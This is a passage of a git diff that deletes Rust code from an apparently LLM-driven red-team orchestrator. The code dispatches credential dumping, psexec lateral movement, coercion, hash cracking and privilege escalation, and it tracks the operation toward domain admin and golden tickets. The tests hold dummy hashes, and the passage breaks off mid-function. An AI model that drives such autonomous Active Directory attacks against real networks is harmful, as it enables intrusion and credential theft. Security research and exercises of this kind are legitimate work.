Ok(CallbackResult::Continue(format!( - "Crack task dispatched for {username}@{domain} ({hash_type}): {}", - task_id.as_deref().unwrap_or("queued") - ))) - } - - /// report_cracked_credential is disabled — cracked passwords are extracted from - /// hashcat/john stdout via output_extraction.rs parsers. LLMs must never construct - /// credential data directly. - /// This handler exists as a safety net in case the LLM somehow invokes it. - pub(super) async fn report_cracked_credential( - &self, - _call: &ToolCall, - ) -> Result { - warn!("report_cracked_credential called but disabled — cracked passwords are auto-extracted from tool output"); - Ok(CallbackResult::Continue( - "This tool is disabled. Cracked passwords are automatically extracted from \ - hashcat and john output. Run the cracking tools and the system will parse \ - and store cracked credentials automatically." - .to_string(), - )) - } -} diff --git a/ares-orchestrator/src/callback_handler/mod.rs b/ares-orchestrator/src/callback_handler/mod.rs deleted file mode 100644 index de02f2c2..00000000 --- a/ares-orchestrator/src/callback_handler/mod.rs +++ /dev/null @@ -1,111 +0,0 @@ -//! Orchestrator-specific callback handler for state query and dispatch tools. -//! -//! Implements `CallbackHandler` to handle tools that need in-memory state access: -//! -//! **Query tools** — read from SharedState (credentials, hashes, tasks, agent status) -//! **Dispatch tools** — submit sub-tasks via the Dispatcher (recon, credential_access, etc.) -//! -//! These tools are available only to the orchestrator agent role. - -mod dispatch; -mod query; -#[cfg(test)] -mod tests; - -use std::sync::Arc; - -use anyhow::Result; -use tracing::warn; - -use ares_llm::provider::ToolCall; -use ares_llm::{CallbackHandler, CallbackResult}; - -use crate::dispatcher::Dispatcher; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -/// Callback handler for orchestrator LLM agent tools. -/// -/// Provides direct access to shared state (for query tools) and the dispatcher -/// (for sub-task submission) without going through Redis tool queues. -pub struct OrchestratorCallbackHandler { - pub(super) state: SharedState, - pub(super) dispatcher: Option>, - pub(super) task_queue: Option, -} - -impl OrchestratorCallbackHandler { - pub fn new(state: SharedState, task_queue: TaskQueue) -> Self { - Self { - state, - dispatcher: None, - task_queue: Some(task_queue), - } - } - - #[cfg(test)] - pub fn new_for_test(state: SharedState) -> Self { - Self { - state, - dispatcher: None, - task_queue: None, - } - } - - pub fn with_dispatcher(mut self, dispatcher: Arc) -> Self { - self.dispatcher = Some(dispatcher); - self - } -} - -#[async_trait::async_trait] -impl CallbackHandler for OrchestratorCallbackHandler { - async fn handle_callback(&self, call: &ToolCall) -> Option> { - match call.name.as_str() { - // Query tools - "get_credential_summary" => Some(self.get_credential_summary().await), - "get_hash_summary" => Some(self.get_hash_summary().await), - "get_all_credentials" => Some(self.get_all_credentials(call).await), - "get_all_hashes" => Some(self.get_all_hashes(call).await), - "get_hash_value" => Some(self.get_hash_value(call).await), - "get_pending_tasks" => Some(self.get_pending_tasks().await), - "get_agent_status" => Some(self.get_agent_status().await), - "get_operation_summary" => Some(self.get_operation_summary().await), - // Recording tools — persist to state and Redis - "record_credential" => Some(self.record_credential(call).await), - "record_timeline_event" => Some(self.record_timeline_event(call).await), - // Dispatch tools - "dispatch_recon" => Some(self.dispatch_recon(call).await), - "dispatch_credential_access" => Some(self.dispatch_credential_access(call).await), - "dispatch_lateral_movement" => Some(self.dispatch_lateral(call).await), - "dispatch_privesc_exploit" => Some(self.dispatch_exploit(call).await), - "dispatch_coercion" => Some(self.dispatch_coercion(call).await), - "dispatch_crack" => Some(self.dispatch_crack(call).await), - // Cracker result — persist cracked credential and update hash - "report_cracked_credential" => Some(self.report_cracked_credential(call).await), - // Not ours — let built-in handler take over - _ => None, - } - } - - async fn on_token_usage(&self, usage: &ares_llm::TokenUsage, model: &str) { - if usage.input_tokens == 0 && usage.output_tokens == 0 { - return; - } - if let Some(ref queue) = self.task_queue { - let op_id = self.state.read().await.operation_id.clone(); - let mut conn = queue.connection(); - if let Err(e) = ares_core::token_usage::increment_token_usage( - &mut conn, - &op_id, - usage.input_tokens.into(), - usage.output_tokens.into(), - model, - ) - .await - { - warn!(err = %e, "Failed to record incremental token usage"); - } - } - } -} diff --git a/ares-orchestrator/src/callback_handler/query.rs b/ares-orchestrator/src/callback_handler/query.rs deleted file mode 100644 index acd83112..00000000 --- a/ares-orchestrator/src/callback_handler/query.rs +++ /dev/null @@ -1,318 +0,0 @@ -//! Query tools — read from in-memory state. - -use std::collections::HashMap; - -use anyhow::Result; -use serde_json::json; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use super::OrchestratorCallbackHandler; - -impl OrchestratorCallbackHandler { - pub(super) async fn get_credential_summary(&self) -> Result { - let state = self.state.read().await; - let mut by_domain: HashMap<&str, (usize, usize)> = HashMap::new(); - - for cred in &state.credentials { - let domain = if cred.domain.is_empty() { - "unknown" - } else { - &cred.domain - }; - let entry = by_domain.entry(domain).or_insert((0, 0)); - entry.0 += 1; - if cred.is_admin { - entry.1 += 1; - } - } - - let summary: Vec = by_domain - .iter() - .map(|(domain, (total, admin))| { - json!({ - "domain": domain, - "total": total, - "admin": admin, - }) - }) - .collect(); - - let result = json!({ - "total_credentials": state.credentials.len(), - "by_domain": summary, - "has_domain_admin": state.has_domain_admin, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_hash_summary(&self) -> Result { - let state = self.state.read().await; - let mut by_type: HashMap<&str, (usize, usize)> = HashMap::new(); - - for hash in &state.hashes { - let entry = by_type.entry(&hash.hash_type).or_insert((0, 0)); - entry.0 += 1; - if hash.cracked_password.is_some() { - entry.1 += 1; - } - } - - let summary: Vec = by_type - .iter() - .map(|(hash_type, (total, cracked))| { - json!({ - "hash_type": hash_type, - "total": total, - "cracked": cracked, - "uncracked": total - cracked, - }) - }) - .collect(); - - let result = json!({ - "total_hashes": state.hashes.len(), - "by_type": summary, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_all_credentials(&self, call: &ToolCall) -> Result { - let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; - let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; - - let state = self.state.read().await; - let total = state.credentials.len(); - let page: Vec = state - .credentials - .iter() - .skip(offset) - .take(limit) - .map(|c| { - json!({ - "username": c.username, - "domain": c.domain, - "has_password": !c.password.is_empty(), - "is_admin": c.is_admin, - "source": c.source, - }) - }) - .collect(); - - let result = json!({ - "credentials": page, - "total": total, - "offset": offset, - "limit": limit, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_all_hashes(&self, call: &ToolCall) -> Result { - let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; - let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; - - let state = self.state.read().await; - let total = state.hashes.len(); - let page: Vec = state - .hashes - .iter() - .skip(offset) - .take(limit) - .map(|h| { - json!({ - "username": h.username, - "domain": h.domain, - "hash_type": h.hash_type, - "cracked": h.cracked_password.is_some(), - "source": h.source, - // Don't expose raw hash value to LLM — it doesn't need it - "has_aes_key": h.aes_key.is_some(), - }) - }) - .collect(); - - let result = json!({ - "hashes": page, - "total": total, - "offset": offset, - "limit": limit, - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_hash_value(&self, call: &ToolCall) -> Result { - let username = call.arguments["username"].as_str().unwrap_or(""); - let domain = call.arguments["domain"].as_str().unwrap_or(""); - let hash_type_filter = call.arguments["hash_type"].as_str(); - - let state = self.state.read().await; - let matches: Vec = state - .hashes - .iter() - .filter(|h| { - h.username.eq_ignore_ascii_case(username) - && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) - && hash_type_filter - .map(|t| h.hash_type.eq_ignore_ascii_case(t)) - .unwrap_or(true) - }) - .map(|h| { - let mut entry = json!({ - "username": h.username, - "domain": h.domain, - "hash_type": h.hash_type, - "hash_value": h.hash_value, - "cracked": h.cracked_password.is_some(), - }); - if let Some(ref aes) = h.aes_key { - entry["aes_key"] = json!(aes); - } - entry - }) - .collect(); - - if matches.is_empty() { - Ok(CallbackResult::Continue(format!( - "No hashes found for {username}@{domain}" - ))) - } else { - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &matches, - )?)) - } - } - - pub(super) async fn get_pending_tasks(&self) -> Result { - let state = self.state.read().await; - let tasks: Vec = state - .pending_tasks - .values() - .map(|t| { - json!({ - "task_id": t.task_id, - "task_type": t.task_type, - "assigned_agent": t.assigned_agent, - "status": format!("{:?}", t.status), - "created_at": t.created_at.to_rfc3339(), - }) - }) - .collect(); - - let result = json!({ - "pending_tasks": tasks, - "total": tasks.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_agent_status(&self) -> Result { - let task_queue = self - .task_queue - .as_ref() - .ok_or_else(|| anyhow::anyhow!("TaskQueue not configured"))?; - // Read heartbeats from Redis to get agent status (SCAN to avoid blocking) - let mut conn = task_queue.connection(); - let pattern = "ares:heartbeat:*"; - let keys = { - let mut all_keys = Vec::new(); - let mut cursor: u64 = 0; - loop { - let result: Result<(u64, Vec), redis::RedisError> = redis::cmd("SCAN") - .arg(cursor) - .arg("MATCH") - .arg(pattern) - .arg("COUNT") - .arg(100) - .query_async(&mut conn) - .await; - match result { - Ok((next_cursor, keys)) => { - all_keys.extend(keys); - cursor = next_cursor; - if cursor == 0 { - break; - } - } - Err(_) => break, - } - } - all_keys - }; - - let mut agents: Vec = Vec::new(); - for key in &keys { - if let Ok(data) = redis::cmd("GET") - .arg(key) - .query_async::(&mut conn) - .await - { - if let Ok(parsed) = serde_json::from_str::(&data) { - agents.push(parsed); - } - } - } - - let result = json!({ - "agents": agents, - "total": agents.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } - - pub(super) async fn get_operation_summary(&self) -> Result { - let state = self.state.read().await; - - let cracked_count = state - .hashes - .iter() - .filter(|h| h.cracked_password.is_some()) - .count(); - let admin_count = state.credentials.iter().filter(|c| c.is_admin).count(); - - let result = json!({ - "operation_id": state.operation_id, - "target_ips": state.target_ips, - "domains": state.domains, - "has_domain_admin": state.has_domain_admin, - "credentials": { - "total": state.credentials.len(), - "admin": admin_count, - }, - "hashes": { - "total": state.hashes.len(), - "cracked": cracked_count, - "uncracked": state.hashes.len() - cracked_count, - }, - "hosts": state.hosts.len(), - "users": state.users.len(), - "discovered_vulnerabilities": state.discovered_vulnerabilities.len(), - "exploited_vulnerabilities": state.exploited_vulnerabilities.len(), - "pending_tasks": state.pending_tasks.len(), - "completed_tasks": state.completed_tasks.len(), - }); - - Ok(CallbackResult::Continue(serde_json::to_string_pretty( - &result, - )?)) - } -} diff --git a/ares-orchestrator/src/callback_handler/tests.rs b/ares-orchestrator/src/callback_handler/tests.rs deleted file mode 100644 index 5c410d1a..00000000 --- a/ares-orchestrator/src/callback_handler/tests.rs +++ /dev/null @@ -1,547 +0,0 @@ -use super::*; -use serde_json::json; - -use ares_llm::provider::ToolCall; -use ares_llm::CallbackResult; - -use crate::state::SharedState; - -/// Helper to create a credential without Default. -fn make_cred( - username: &str, - password: &str, - domain: &str, - is_admin: bool, -) -> ares_core::models::Credential { - ares_core::models::Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.into(), - password: password.into(), - domain: domain.into(), - source: String::new(), - discovered_at: None, - is_admin, - parent_id: None, - attack_step: 0, - } -} - -/// Helper to create a hash without Default. -fn make_hash( - username: &str, - domain: &str, - hash_type: &str, - hash_value: &str, - aes_key: Option<&str>, -) -> ares_core::models::Hash { - ares_core::models::Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.into(), - hash_value: hash_value.into(), - hash_type: hash_type.into(), - domain: domain.into(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: aes_key.map(|s| s.to_string()), - } -} - -fn make_handler() -> OrchestratorCallbackHandler { - OrchestratorCallbackHandler::new_for_test(SharedState::new("test-op".to_string())) -} - -#[tokio::test] -async fn test_credential_summary_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c1".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_credentials"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_credential_summary_with_data() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "pass", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "pass1", "contoso.local", false)); - } - - let call = ToolCall { - id: "c2".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_credentials"], 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_summary_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c3".into(), - name: "get_hash_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_hashes"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_lookup() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b435b51404ee:313b6f423a71d74c", - Some("f8b6c5e4d3a2b109"), - )); - } - - let call = ToolCall { - id: "c4".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "krbtgt", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("313b6f423a71d74c")); - assert!(msg.contains("f8b6c5e4d3a2b109")); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_not_found() { - let handler = make_handler(); - let call = ToolCall { - id: "c5".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "nobody", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => assert!(msg.contains("No hashes found")), - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_pending_tasks_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c6".into(), - name: "get_pending_tasks".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_unknown_tool_returns_none() { - let handler = make_handler(); - let call = ToolCall { - id: "c7".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(handler.handle_callback(&call).await.is_none()); -} - -#[tokio::test] -async fn test_dispatch_without_dispatcher() { - let handler = make_handler(); - let call = ToolCall { - id: "c8".into(), - name: "dispatch_recon".into(), - arguments: json!({"target_ip": "192.168.58.10"}), - }; - let result = handler.handle_callback(&call).await.unwrap(); - assert!(result.is_err()); // No dispatcher configured -} - -#[tokio::test] -async fn test_operation_summary() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "pass", "contoso.local", true)); - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b435:313b6f42", - None, - )); - s.has_domain_admin = true; - } - - let call = ToolCall { - id: "c10".into(), - name: "get_operation_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["credentials"]["total"], 1); - assert_eq!(parsed["credentials"]["admin"], 1); - assert_eq!(parsed["hashes"]["total"], 1); - assert_eq!(parsed["has_domain_admin"], true); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_dispatch_crack_without_dispatcher() { - let handler = make_handler(); - let call = ToolCall { - id: "c11".into(), - name: "dispatch_crack".into(), - arguments: json!({"hash_value": "aad3b435:beef", "hash_type": "ntlm"}), - }; - let result = handler.handle_callback(&call).await.unwrap(); - assert!(result.is_err()); // No dispatcher configured -} - -#[tokio::test] -async fn test_all_credentials_pagination() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - for i in 0..10 { - s.credentials.push(make_cred( - &format!("user{i}"), - "pass", - "contoso.local", - false, - )); - } - } - - let call = ToolCall { - id: "c9".into(), - name: "get_all_credentials".into(), - arguments: json!({"limit": 3, "offset": 2}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total"], 10); - assert_eq!(parsed["credentials"].as_array().unwrap().len(), 3); - assert_eq!(parsed["offset"], 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_full_summary_with_populated_state() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "P@ss1", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "pass1", "contoso.local", false)); - s.credentials - .push(make_cred("svc_sql", "SqlP@ss", "fabrikam.local", false)); - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b:beef", - None, - )); - let mut h = make_hash("admin", "contoso.local", "NTLM", "aad3b:dead", None); - h.cracked_password = Some("cracked123".into()); - s.hashes.push(h); - s.has_domain_admin = true; - s.domains.push("contoso.local".into()); - s.discovered_vulnerabilities.insert( - "vuln-1".into(), - ares_core::models::VulnerabilityInfo { - vuln_id: "vuln-1".into(), - vuln_type: "constrained_delegation".into(), - target: "192.168.58.30".into(), - discovered_by: "test".into(), - discovered_at: chrono::Utc::now(), - details: { - let mut m = std::collections::HashMap::new(); - m.insert("account".into(), json!("svc_sql")); - m - }, - recommended_agent: String::new(), - priority: 5, - }, - ); - } - - let call = ToolCall { - id: "int-1".into(), - name: "get_operation_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["credentials"]["total"], 3); - assert_eq!(p["credentials"]["admin"], 1); - assert_eq!(p["hashes"]["total"], 2); - assert_eq!(p["hashes"]["cracked"], 1); - assert_eq!(p["has_domain_admin"], true); - assert_eq!(p["discovered_vulnerabilities"], 1); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_credential_summary_multi_domain() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "p1", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "p2", "contoso.local", false)); - s.credentials - .push(make_cred("admin2", "p3", "fabrikam.local", true)); - } - - let call = ToolCall { - id: "int-2".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["total_credentials"], 3); - let domains = p["by_domain"].as_array().unwrap(); - assert_eq!(domains.len(), 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_case_insensitive_lookup() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.hashes.push(make_hash( - "Administrator", - "CONTOSO.LOCAL", - "NTLM", - "beef:dead", - None, - )); - } - - let call = ToolCall { - id: "int-3".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "administrator", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => assert!(msg.contains("beef:dead")), - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_filter_by_type() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.hashes.push(make_hash( - "admin", - "contoso.local", - "NTLM", - "ntlm_hash", - None, - )); - s.hashes.push(make_hash( - "admin", - "contoso.local", - "aes256", - "aes_hash", - None, - )); - } - - let call = ToolCall { - id: "int-4".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "admin", "domain": "contoso.local", "hash_type": "aes256"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("aes_hash")); - assert!(!msg.contains("ntlm_hash")); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_all_dispatch_tools_fail_without_dispatcher() { - let handler = make_handler(); - let dispatch_tools = [ - ("dispatch_recon", json!({"target_ip": "192.168.58.10"})), - ( - "dispatch_credential_access", - json!({"technique": "secretsdump", "target_ip": "x", "domain": "x", "username": "x", "password": "x"}), - ), - ( - "dispatch_lateral_movement", - json!({"target_ip": "x", "technique": "psexec", "username": "x", "password": "x", "domain": "x"}), - ), - ("dispatch_privesc_exploit", json!({"vuln_id": "v-1"})), - ( - "dispatch_coercion", - json!({"target_ip": "x", "listener_ip": "x"}), - ), - ( - "dispatch_crack", - json!({"hash_value": "aad3b:beef", "hash_type": "ntlm"}), - ), - ]; - - for (tool, args) in &dispatch_tools { - let call = ToolCall { - id: format!("disp-{tool}"), - name: tool.to_string(), - arguments: args.clone(), - }; - let result = handler.handle_callback(&call).await; - assert!(result.is_some(), "Should recognize: {tool}"); - assert!( - result.unwrap().is_err(), - "Should error without dispatcher: {tool}" - ); - } -} - -#[tokio::test] -async fn test_all_callback_tools_recognized() { - let handler = make_handler(); - let tools = [ - "get_credential_summary", - "get_hash_summary", - "get_all_credentials", - "get_all_hashes", - "get_hash_value", - "get_pending_tasks", - "get_operation_summary", - "dispatch_recon", - "dispatch_credential_access", - "dispatch_lateral_movement", - "dispatch_privesc_exploit", - "dispatch_coercion", - "dispatch_crack", - ]; - - for tool in &tools { - let call = ToolCall { - id: format!("route-{tool}"), - name: tool.to_string(), - arguments: json!({"username": "x", "domain": "x", "target_ip": "x", - "technique": "x", "password": "x", "hash_value": "x", - "hash_type": "x", "vuln_id": "x", "listener_ip": "x"}), - }; - assert!( - handler.handle_callback(&call).await.is_some(), - "Handler should recognize: {tool}" - ); - } - - // Unknown tool returns None - let call = ToolCall { - id: "route-unknown".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(handler.handle_callback(&call).await.is_none()); -} - -#[tokio::test] -async fn test_all_hashes_pagination_large() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - for i in 0..50 { - s.hashes.push(make_hash( - &format!("user{i}"), - "contoso.local", - "NTLM", - &format!("hash_{i}"), - None, - )); - } - } - - let call = ToolCall { - id: "int-pg".into(), - name: "get_all_hashes".into(), - arguments: json!({"limit": 10, "offset": 40}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["total"], 50); - assert_eq!(p["hashes"].as_array().unwrap().len(), 10); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} diff --git a/ares-orchestrator/src/completion.rs b/ares-orchestrator/src/completion.rs deleted file mode 100644 index 54383290..00000000 --- a/ares-orchestrator/src/completion.rs +++ /dev/null @@ -1,492 +0,0 @@ -//! Completion and golden-ticket wait loops. -//! -//! These functions block (async) until the operation reaches a terminal state: -//! all forests dominated, golden tickets forged, max runtime exceeded, or -//! explicit shutdown. -//! -//! Two config flags control early-exit behaviour (mutually exclusive): -//! - `stop_on_domain_admin`: stop as soon as DA is achieved on any domain, -//! without waiting for all trusted forests to be dominated. -//! - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with -//! ExtraSid for child→parent escalation, then stop once forged. - -use std::collections::HashSet; -use std::sync::Arc; -use std::time::Duration; - -use chrono::Utc; -use redis::AsyncCommands; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::SharedState; - -/// Pure computation: given state fields, return undominated forest root domains. -/// -/// Used by both the async `undominated_forests()` and `SharedState::snapshot()`. -pub fn compute_undominated_forests( - target_domain: Option<&str>, - first_domain: Option<&str>, - trusted_domains: &std::collections::HashMap, - dominated_domains: &HashSet, -) -> Vec { - let mut required_forests: HashSet = HashSet::new(); - - if let Some(td) = target_domain { - if !td.is_empty() { - required_forests.insert(forest_root_of(td)); - } - } - if let Some(fd) = first_domain { - required_forests.insert(forest_root_of(fd)); - } - - for trust in trusted_domains.values() { - if trust.is_cross_forest() { - required_forests.insert(forest_root_of(&trust.domain)); - } - } - - if required_forests.is_empty() { - return Vec::new(); - } - - let dominated_roots: HashSet = dominated_domains - .iter() - .map(|d| forest_root_of(d)) - .collect(); - - required_forests - .difference(&dominated_roots) - .cloned() - .collect() -} - -/// Check if all trusted forests have been dominated. -/// -/// Returns a list of forest root domains that still need krbtgt hashes. -/// An empty list means all forests are dominated. -/// -/// This mirrors Python's `all_forests_dominated()` which checks that -/// krbtgt hashes are obtained from every trusted forest, not just the -/// initial target domain. -pub async fn undominated_forests(state: &SharedState) -> Vec { - let inner = state.read().await; - compute_undominated_forests( - inner.target.as_ref().map(|t| t.domain.as_str()), - inner.domains.first().map(|d| d.as_str()), - &inner.trusted_domains, - &inner.dominated_domains, - ) -} - -/// Extract forest root from a domain FQDN. -/// -/// For `north.contoso.local` → `contoso.local` -/// For `contoso.local` → `contoso.local` -fn forest_root_of(domain: &str) -> String { - let lower = domain.to_lowercase(); - let parts: Vec<&str> = lower.split('.').collect(); - if parts.len() <= 2 { - lower - } else { - // Walk up to find the 2-part root (assumes .local/.com TLD) - parts[parts.len() - 2..].join(".") - } -} - -/// Main operation completion loop. -/// -/// Polls every `interval` checking for: -/// - All forests dominated (krbtgt from every trusted forest) -/// - `completed` flag set (external completion signal) -/// - Max runtime exceeded -/// -/// Behaviour is influenced by two mutually exclusive config flags: -/// - `stop_on_domain_admin`: stop as soon as DA is achieved on *any* domain, -/// without waiting for forests or golden tickets. -/// - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with -/// ExtraSid, then stop. If the ticket isn't forged within 60 s of DA, stop -/// anyway. -/// -/// When neither flag is set (default), the operation continues until all -/// trusted forests are dominated or max runtime is exceeded. -pub async fn wait_for_completion( - state: &SharedState, - dispatcher: &Arc, - mut shutdown_rx: watch::Receiver, - max_runtime: Duration, - interval: Duration, -) { - let start = tokio::time::Instant::now(); - - // Read stop-condition flags from config (default: both false) - let (stop_on_da, stop_on_gt) = dispatcher - .ares_config - .as_ref() - .map(|c| { - ( - c.operation.stop_on_domain_admin, - c.operation.stop_on_golden_ticket, - ) - }) - .unwrap_or((false, false)); - - info!( - max_runtime_secs = max_runtime.as_secs(), - stop_on_domain_admin = stop_on_da, - stop_on_golden_ticket = stop_on_gt, - "Completion monitor started" - ); - - loop { - // Check shutdown - if *shutdown_rx.borrow() { - info!("Completion monitor interrupted by shutdown"); - return; - } - - let elapsed = start.elapsed(); - let (has_da, has_gt, completed) = { - let inner = state.read().await; - ( - inner.has_domain_admin, - inner.has_golden_ticket, - inner.completed, - ) - }; - - // Check completion conditions. - // - // Priority order matches Python's _wait_for_completion(): - // 1. External completed flag (e.g. CLI stop signal) - // 2. Max runtime exceeded - // 3. stop_on_domain_admin: stop immediately on DA - // 4. stop_on_golden_ticket: stop when DA + golden ticket achieved - // 5. Default: stop when all trusted forests are dominated - let reason = if completed { - Some("operation marked completed") - } else if elapsed >= max_runtime { - Some("max runtime exceeded") - } else if has_da { - if stop_on_da { - // Config says stop immediately on DA — skip forest check - Some("domain admin achieved (stop_on_domain_admin)") - } else if stop_on_gt { - // stop_on_golden_ticket: keep running until GT is forged. - // Do NOT fall through to the "all forests dominated" default - // path — that would exit without the golden ticket. - if has_gt { - Some("golden ticket forged (stop_on_golden_ticket)") - } else { - None // Continue — waiting for golden ticket - } - } else { - // Default: continue until all forests are dominated - let remaining = undominated_forests(state).await; - if remaining.is_empty() { - Some("all forests dominated") - } else { - debug!( - undominated = ?remaining, - "DA achieved but forests remain undominated" - ); - None // Continue — other forests still need krbtgt - } - } - } else { - None - }; - - if let Some(reason) = reason { - info!( - reason = reason, - elapsed_secs = elapsed.as_secs(), - has_domain_admin = has_da, - has_golden_ticket = has_gt, - "Completion condition met" - ); - - // When blue team is enabled, auto-submit an investigation from the - // operation state if none have been submitted yet, then wait for all - // investigations to drain before signalling stop. - // Cap at 45 minutes to avoid hanging forever if an investigation is stuck. - if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { - info!("Blue team enabled — waiting for investigations to finish before shutdown"); - let mut conn = dispatcher.queue.connection(); - - // Check if any blue investigations already exist for this operation. - // If not, auto-submit one so blue always gets at least one run. - let op_inv_key = format!( - "ares:blue:op:{}:investigations", - dispatcher.config.operation_id - ); - let existing: i64 = redis::cmd("SCARD") - .arg(&op_inv_key) - .query_async(&mut conn) - .await - .unwrap_or(0); - if existing == 0 { - info!("No blue investigations found — auto-submitting from operation state"); - if let Err(e) = - auto_submit_blue_investigation(state, dispatcher, &mut conn).await - { - warn!(err = %e, "Failed to auto-submit blue investigation"); - } - } - let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(2700); - loop { - if *shutdown_rx.borrow() { - info!("Completion monitor interrupted by shutdown while waiting for blue"); - break; - } - - if 